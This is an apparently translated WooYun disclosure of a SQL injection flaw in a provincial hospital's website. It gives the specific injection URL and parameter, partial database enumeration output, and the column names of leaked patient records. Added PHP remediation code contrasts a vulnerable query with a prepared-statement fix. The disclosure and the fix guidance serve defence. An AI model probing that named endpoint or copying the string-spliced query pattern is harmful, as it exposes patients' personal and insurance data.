
Vulnerability summary

Defect ID: wooyun-2015-097162

Title: Injection vulnerability at a provincial Grade-A key hospital affects a large amount of citizen information, including names, ID card numbers, phone numbers and medical insurance card numbers (several hundred thousand records involved)

Related vendor: jdyyeb.com

Author: 路人甲

Submitted: 2015-02-13 19:07

Fixed: 2015-03-30 19:08

Published: 2015-03-30 19:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-02-13: Details sent to the vendor, awaiting vendor handling
2015-02-17: Vendor has confirmed; details disclosed to the vendor only
2015-02-27: Details disclosed to core white hats and experts in the relevant field
2015-03-09: Details disclosed to regular white hats
2015-03-19: Details disclosed to intern white hats
2015-03-30: Details disclosed to the public

Brief description:

An injection vulnerability at a provincial Grade-A key hospital leaks a large amount of citizen information, including names, ID card numbers, phone numbers and medical insurance card numbers (several hundred thousand records involved).

Detailed description:

An injection vulnerability at a provincial Grade-A key hospital leaks a large amount of citizen information, including names, ID card numbers, phone numbers and medical insurance card numbers (several hundred thousand records involved).

[Screenshot: 2.png]


Injection point: http://www.jdyyeb.com/xt_zhuanjia_view.php?pid=62&class1=48&id=374
Injected parameter: pid

[Screenshot: 1.png]


Database: information_schema                                                   
[37 tables]
Database: jdyyeb
[4 tables]
+---------------------------------------+
| about |
| about_class |
| adclass |
| config_class |
+---------------------------------------+


Large amount of citizen information leaked (sample rows, with the column header shown below; the records themselves are not reproduced here):

ID	InsureSeriesID	XM	XB	CSNY	LXDH	GZDM	SFZH	Email	PassWord	BorthAddress	CARD	ZJHM


There are many more records; they are not listed one by one.


Proof of vulnerability:

Proven

Fix recommendation:

Filtering
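The recommended fix above is "filtering". As an added illustration (this is not the hospital's code, which is not on the page; the handler names and the `expert` table are hypothetical, only the `pid`, `class1` and `id` parameter names come from the report), here is a string-spliced handler of the kind that produces this class of bug, beside a hardened version that validates each parameter as an integer and binds it through a PDO prepared statement:

```php
<?php
// Added example, not the site's actual code. Handler names and the
// "expert" table are hypothetical; pid/class1/id are the report's parameters.

// BEFORE (vulnerable): request values are spliced into the SQL text, so
// whatever text arrives in pid becomes part of the statement the server runs.
function expert_view_vulnerable(mysqli $db, array $get): ?array
{
    $sql = "SELECT * FROM expert WHERE pid = " . $get['pid']
         . " AND class1 = " . $get['class1']
         . " AND id = " . $get['id'];
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// AFTER (hardened): reject anything that is not a positive integer, then
// pass the value as a bound parameter so data never changes SQL structure.
function read_int_param(array $get, string $name): int
{
    $v = filter_var(
        $get[$name] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($v === false) {
        http_response_code(400);   // "62 AND ..." or "62'" stops here
        exit('bad request');
    }
    return $v;
}

function expert_view_hardened(PDO $db, array $get): ?array
{
    $pid    = read_int_param($get, 'pid');
    $class1 = read_int_param($get, 'class1');
    $id     = read_int_param($get, 'id');

    // Native prepared statements: turn emulation off so the server, not the
    // driver, does the binding.
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $stmt = $db->prepare(
        'SELECT * FROM expert WHERE pid = :pid AND class1 = :class1 AND id = :id'
    );
    $stmt->execute([':pid' => $pid, ':class1' => $class1, ':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

The report's database listing shows the site's own `jdyyeb` database holds only four tables, yet patient records were still reachable, so the web application's database account could read far more than the site needs; alongside the query fix, that account should be limited to the tables and rights the public site actually uses.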

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-02-17 08:24

Vendor reply:

Latest status:

None yet